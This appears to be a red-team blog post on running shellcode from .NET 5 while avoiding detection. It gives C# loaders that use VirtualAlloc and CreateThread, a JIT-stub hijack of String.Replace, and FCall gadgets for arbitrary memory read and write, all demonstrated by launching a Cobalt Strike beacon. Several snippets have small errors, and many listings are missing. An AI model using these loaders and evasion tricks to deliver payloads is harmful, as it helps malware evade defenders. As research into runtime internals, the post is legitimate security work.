« Back to home

Weird Ways to Run Unmanaged Code in .NET

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often for us as Red Teamer’s we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine, however it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the projects DLL loader for the moment, the underlying technique to transition from managed to unmanaged code used by D/Invoke is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. And if we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within a x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + (int)nameAddr);
        if (m == "VirtualAlloc")
        {
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (i * 4));
            return baseAddr + (int)exportAddr;
        }
    }

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc("HELLO");
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 18 bytes when running within a x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Well usually this pointer would live in a slot, which is located within a vector following the MethodTable, which is in turn indexed by the n_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which now that we understand just how execution flows via the JIT process should be relatively straight forward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require a EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ec.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + sizeof(MethodDesc)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp‘ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, ptr2, shellcode.Length);

// Now we invoke our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);

Put together we get code like this:

Once executed, if everything goes well, we end up with our beacon spawning from within .NET:

Now I know what you’re thinking… what about that VirtualAlloc call that we made there… wasn’t that a P/Invoke that we were trying to avoid? Well, yes smarty pants! This was a P/Invoke, however in-keeping with our exploration of weird ways to invoke .NET, there is nothing stopping us from stealing an existing P/Invoke from the .NET framework. For example, if we look within the Interop.Kernel32 class, we’ll see a list of P/Invoke methods, including… VirtualAlloc:

So, what about if we just borrow that VirtualAlloc method for our evil bidding? Then we don’t have to P/Invoke directly from our code:

var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), 0x3000, 0x40 });

Now unfortunately the Interop.Kernel32.VirtualAlloc P/Invoke method returns a void*, which means that we receive a System.Reflection.Pointer type. This normally requires an unsafe method to play around with, which for the purposes of this post I’m trying to avoid. So let’s try and convert that into an IntPtr using the internal GetPointerValue method:

IntPtr alloc = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });

And there we have allocated RWX memory without having to directly reference any P/Invoke methods. Combined with our execution example, we end up with a POC like this:

And when executed, we get a nice beacon:

Now this is nice, but what about if we want to run unmanaged code and then resume executing further .NET code afterwards? Well we can do this in a few ways, but let’s have a look at what happens to our MethodDesc after the JIT process has completed. If we take a memory dump of the String.Replace MethodDesc before we have it JIT’d:

And then we look again after, we will see an address being populated:

And if we dump the memory from this address:

What you are seeing here is called a “Native Code Slot”, which is a pointer to the compiled methods native code once the JIT process has completed. Now this field is not guaranteed to be present, and we can tell if the MethodDesc provides a location for a Native Code Slot by again looking at the m_wFlags property:

The flag that we are looking to be set is mdcHasNativeCodeSlot:

If this flag is present, we can simply force JIT compilation and update the Native Code Slot, pointing it to our desired unmanaged code, meaning further execution of the .NET method will trigger our payload. Once executed, we can then jump back to the actual JIT’d native code to ensure that the original .NET code is executed. The code to do this looks like this:

And when run, we see that we can resume .NET execution after our unmanaged code has finished executing:

So, what else can we find in the .NET runtime, are there any other quirks we can use to transition between managed and unmanaged code?

InternalCall and QCall

If you’ve spent much time disassembling the .NET runtime, you will have come across methods annotated with attributes such as [MethodImpl(MethodImplOptions.InternalCall)]:

In other areas, you will see references to a DllImport to a strangely named QCall DLL:

Both are examples of code which transfer execution into the CLR. Inside the CLR they are referred to as an “FCall” and “QCall” respectively. The reasons that these calls exist are varied, but essentially when the .NET framework can’t do something from within managed code, a FCall or QCall is used to request native code perform the function before returning back to .NET.

One good example of this in action is something that we’ve already encountered, Marshal.GetDelegateForFunctionPointer. If we disassemble the System.Private.CoreLib DLL we see that this is ultimately marked as an FCall:

Let’s follow this path further into the CLR source code and see where the call ends up. The file that we need to look at is ecalllist.h, which describes the FCall and QCall methods implemented within the CLR, including our GetDelegateForFunctionPointerInternal call:

If we jump over to the native method MarshalNative::GetFunctionPointerForDelegateInternal, we can actually see the native code used when this method is called:

Now… wouldn’t it be cool if we could find some of these FCall and QCall gadgets which would allow us to play around with unmanaged memory? After all, forcing defenders to transition between .NET code disassembly into reviewing the source for the CLR certainly would slow down static analysis… hopefully increasing that WTF!! factor during analysis. Let’s start by hunting for a set of memory read and write gadgets which as we now know from above, will lead to code execution.

The first .NET method we will look at is System.StubHelpers.StubHelpers.GetNDirectTarget, which is an internal static method:

Again we can trace this code into the CLR and see what is happening:

OK so this looks good, here we have an IntPtr being passed from managed to unmanaged code, without any kind of validation that the pointer we are passing is in fact a NDirectMethodDesc object pointer. So what does that pNMD->GetNDirectTarget() call do?

So here we have a method returning a member variable from an object we control. A review shows us that we can use this to return arbitrary memory of IntPtr.Size bytes in length. How can we do this? Well let’s return to .NET and try the following code:

And if we run this:

Awesome, so we have our first example of a gadget which can be useful to interact with unmanaged memory. Next, we should think about how to write memory. Again if we review potential FCalls and QCalls it doesn’t take long to stumble over several candidates, including System.StubHelpers.MngdRefCustomMarshaler.CreateMarshaler:

Following the execution path we find that this results in the execution of the method MngdRefCustomMarshaler::CreateMarshaler:

And again, if we look at what this method does within native code:

Checking on MngRefCustomMarshalaer, we find that the m_pCMHelper is the only member variable present in the class:

So, this one is easy, we can write 8 bytes to any memory location as we control both pThis and pCMHelper. The code to do this looks something like this:

Let’s have some fun and use this gadget to modify the length of a System.String object to show the control we have to modify arbitrary memory bytes:

OK, so now we have our 2 (of MANY possible) gadgets, what would it looks like if we transplanted this into our code execution example? Well, we end up with something pretty weird:

And of course, if we execute this, we end up with our desired result of unmanaged code execution:

A project providing all examples in this post can be found here.

With the size of the .NET framework, this of course only scratches the surface, but hopefully has given you a few ideas about how we can abuse some pretty benign looking functions to achieve unmanaged code execution in weird ways. Have fun!